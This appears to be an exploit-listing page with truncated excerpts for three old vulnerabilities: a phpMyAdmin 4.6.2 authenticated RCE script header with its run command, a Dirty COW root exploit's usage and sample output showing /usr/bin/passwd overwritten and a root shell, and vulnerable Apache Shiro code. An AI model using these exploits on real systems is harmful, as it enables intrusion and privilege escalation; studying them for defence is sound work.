PhpMyAdmin 4.6.2 Backend Command Execution Exploit (CVE-2016-5734)

CVE-2016-5734 exploit notes: after logging in to PhpMyAdmin, commands can be executed directly, allowing privilege escalation. CODE: #!/usr/bin/env python """cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua' […]



[Privilege Escalation] Dirty COW Vulnerability CVE-2016-5195 2.6.22 < 3.9 (x86/x64)

/* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * Size of binary: 57048 * Racing, this may take a while.. * /usr/bin/passwd is overwritten * Popping root shell. * Don't forget to restore /tmp/bak * thread stopped * thread stopped * root@box:/root/cow# id * uid= […]



Apache Shiro CVE-2016-6802 Authorization Bypass Vulnerability

On the Apache Shiro authorization bypass vulnerability. The vulnerable code segment: public static String getContextPath(HttpServletRequest request) { String contextPath = (String) request.getAttribute(INCLUDE_CONTEXT_PATH_ATTRIBUTE); if (contextPath == null) { contextPath = request.getContextPath(); } if ("/".equals(contextPath)) { // Invalid case, but happens for includes on Jetty: silently adapt it. contextPath = ""; } return decodeRequestString(re […]
